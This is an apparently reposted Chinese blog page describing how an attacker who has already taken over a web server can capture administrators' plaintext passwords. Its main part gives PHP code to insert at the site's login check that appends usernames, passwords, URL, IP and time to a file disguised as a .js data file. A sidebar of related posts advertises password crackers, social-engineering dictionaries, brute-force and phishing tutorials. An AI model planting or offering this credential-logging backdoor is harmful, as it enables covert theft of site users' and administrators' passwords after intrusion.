社工利器后台密码截获方法

最新推荐文章于 2024-04-12 06:01:05 发布
最新推荐文章于 2024-04-12 06:01:05 发布
阅读量658 收藏
点赞数
原文链接:https://my.oschina.net/itxti/blog/184745
版权

为什么80%的码农都做不了架构师?>>>   hot3.png

当我们利用非正常方法拿下一台服务器或者一台服务器里的站时,这时也许不是我们最终的目的,为了得到管理员明文密码但又在md5困住了,于是我们可以运用这个方法截获管理员密码
在我们需要截获的网站后台加入:

加在网站正常程序对用户密码进行判断的位置 

$ip=$_SERVER['REMOTE_ADDR']; //获取ip
 $showtime=date("Y-m-d H:i:s"); //获取日期
 $cururl=GetCurUrl();(自己写获取登入路径的函数) //获取登入页面
 $record="Username:".$userid." Password:".$pwd." Url:".$cururl." IP:".$ip." Time:".$showtime." \r\n";// 组成成字符串集 里面变量自己更改
 $handle=fopen('../include/data/ipdata.js','a+'); fopen以读写创建打开文件
 $write=fwrite($handle,$record); //fwrite函数把刚才的字符串写进文件保存
 
function getCurUrl() {
 if (! empty ( $_SERVER [\"REQUEST_URI\"] )) {
 $scriptName = $_SERVER [\"REQUEST_URI\"];
 $nowurl = $scriptName;
 } else {
 $scriptName = $_SERVER [\"PHP_SELF\"];
 if (empty ( $_SERVER [\"QUERY_STRING\"] )) {
 $nowurl = $scriptName;
 } else {
 $nowurl = $scriptName . \"?\" . $_SERVER [\"QUERY_STRING\"];
 }
 }
 return $nowurl;
 } 自定义获取当前脚本所在url

 

转载于:https://my.oschina.net/itxti/blog/184745

weixin_34248023
关注
社工密码生成器
07-30
本工具是一款社工密码生成器,根据一些个人信息来生成专属一个人的个人密码,包含手机,邮箱,生日等
社工密码字典生成器.zip
05-31
字典生成器
密码截获
思索的IT脚印
03-23 1480
实际上求的是最长回文数,what I have done is that 分开奇偶来匹配,枚举中间点,如果是下一个字符与前一个字符相等,就执行偶数的匹配,奇数的必须执行,因为存在baaab的情况,再找出最大的那个..That'sall!  >_   Time Limit:1000MS  Memory Limit:1024K Description: Catc
万能截取php后台登陆密码的代码
weixin_34414650的博客
01-30 415
拿到webshell之后,想要进一步***,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,就又写了一遍。代码比较简单,就几句话,我把原理说的详细点,照顾下对php不太了解有朋友。 QUOTE: if($_POST["loginsubmit"]!=""){ //判断是否点了登陆按钮 $sb="us...
简单的截获登录密码
weixin_34247155的博客
05-29 283
2019独角兽企业重金招聘Python工程师标准>>> ...
js通用截获后台密码脚本
xwbk12的博客
12-18 1178
http://blog.51cto.com/jzking121/1220335
03.一分钟教你社工利器:搜索引擎高级语法-飞哥原创.docx
08-14
【搜索引擎高级语法】是社会工程学攻击者在实施攻击时常用的一种信息收集工具。社会工程学攻击者通过各种手段获取信息,包括电话诱骗、恶意U盘和伪造页面等。搜索引擎,尤其是像百度这样的大型搜索引擎,由于其强大...
05. 一分钟教你社工利器:制作社会工程学字典-飞哥原创.docx
08-14
05. 一分钟教你社工利器:制作社会工程学字典-飞哥原创.docx,word版本,有详细截图步骤。
一点社工密码经验
大方子
02-27 7321
第一部分:十大基本规律 规律一:绝大多数人都高估了破译密码的难度和低估了自己密码存在的风险,因而,往往把能够破解密码的人当成神秘人物,同时基本很少有修改自己密码的习惯。    规律二:绝大多数人一生常用的密码通常不会超过3个,如果你破解了某人的QQ密码,很可能你也破解了他的论坛密码、邮箱密码、游戏账号密码...... 规律三:从 性别上看,男性的密码比女性的要更加难破;从年龄层面上看,年轻人的密码...
InnoGPW-all
01-20
Inno Setup 安装程序密码截获工具,收录了InnoGPW0.01、InnoGPW0.05,均为风铃夜思雨的大作,可执行程序截获密码,对于加密的安装程序,可以一试。
风铃第一版3306加密解密工具.exe
07-14
风铃第一版3306加密解密工具.exe
inno解包工具,可解加密的inno setup安装程序
03-01
可解加密的inno setup安装程序,可解加密的inno setup安装程序
xinyucn.cc_InnoGPW.zip
02-08
Inno Setup 安装程序密码截获工具,收录了InnoGPW0.01、InnoGPW0.05,均为风铃夜思雨的大作,可执行程序截获密码,对于加密的安装程序,可以一试。
普罗菲斯gpw-03
03-24
普罗菲斯proface 3.01驱动程序免费提供
Bugku-CTF社工篇之密码
weixin_30593443的博客
08-14 508
姓名:张三 生日;19970315 KEY格式KEY{xxxxxxxxxx} 解题要点:用户习惯 猜想:大多数设置密码习惯都是字母缩写加生日 即zs19970315 bingo~ 转载于:https://www.cnblogs.com/0yst3r-2046/p/11350624.html...
【谨慎学习】手把手教你破解网站管理后台帐号密码_运营管理后台密码
最新发布
2401_84183545的博客
04-12 1313
在上面的讲解中,我们已经学会了如何去获得后台的相关登录界面信息,接下来我们开始对获得的登录界面进行攻击操作,在此为了方便演示我们将以爆破路由器的后台管理界面为例,在执行下面的操作时,因为要使用 burpsuite 工具,所以我们需要安装一个Kali系统(可以使用虚拟机安装),具体安装过程这里不论述,请读者自行下载安装。在上面的情况中,因为ID和密码都是正确的,所以我们很轻松的就获得了这些信息,那么如果管理员输入的账户ID 是正确的而密码是错误的,我们又应该怎么操作呢?
社工利器--setoolkit之钓鱼攻击
Aisen_bear的博客
08-04 2410
该文章仅供参考学习,切勿用于非法用途 简介 社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的
社工中级综合能力思维导图详细解析
这些能力不仅包括了专业知识和技能,如社会工作理论、个案管理、社区组织、政策分析和研究方法等,还包括了人际交往能力、伦理判断、自我反思、领导力和创新能力。中级综合能力则指的是社工在从业一段时间后,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值